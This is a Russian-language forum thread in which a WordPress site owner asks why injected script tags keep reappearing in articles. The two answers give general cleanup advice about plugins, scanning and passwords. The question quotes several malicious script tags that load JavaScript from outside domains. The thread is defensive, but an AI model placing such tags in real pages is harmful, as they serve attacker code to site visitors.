Сайт взломали, в каждой статье стоит скрипт. Как исправить?

Question

[Suleimanov_Ismar]

Здравствуйте!

Столкнулся с проблемой взлома сайта.
Сайт разработан на wordpress'e.

Описание проблемы:

В каждой статье именно в местах ссылок <a href="">Ссылка</a>
стоят скрипты разного рода такие как:

<script type='text/javascript' src='https://sdb.dancewithme.biz/db.js'></script>
<script type='text/javascript' src='https://sdb.dancewithme.biz/db.js'></script>
<script type='text/javascript' src='https://sdb.dancewithme.biz/db.js'></script>
<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>

и

<script type='text/javascript' src='https://s1.trymynewspirit.com/pr.js'></script>

Я очистил все фалы, страницы и все статьи в котором эти скрипты находились, но после того как я опубликую новую статью она в рендомном порядке появляется опять в некоторых статьях и страницах.

Думал при копировании материала что то цепляется, но нет. Все чисто.

Размещаю статью в таком порядке:

Копирую с донорского сайта > В текстовый редактор > Поиск скрипта > Размещение на сайте

Пожалуйста, подскажите что делать?
В чем проблема и где искать корень вируса?

Answer 1

[Johny Smith]

Не ставить больше плагины, в них уязвимости, в начале удалите все плагины, а потом восстанавливайте проект, не удалив плагины, и пытаться восстановить сайт, означает то что его снова взломают, тем же самым путём.

Answer 2

[Alexandr Alexandrov]

Проверьте сайт, к примеру, утилитой https://revisium.com/ai/
Поменяйте пароли
Обновите ядро, модули если это cms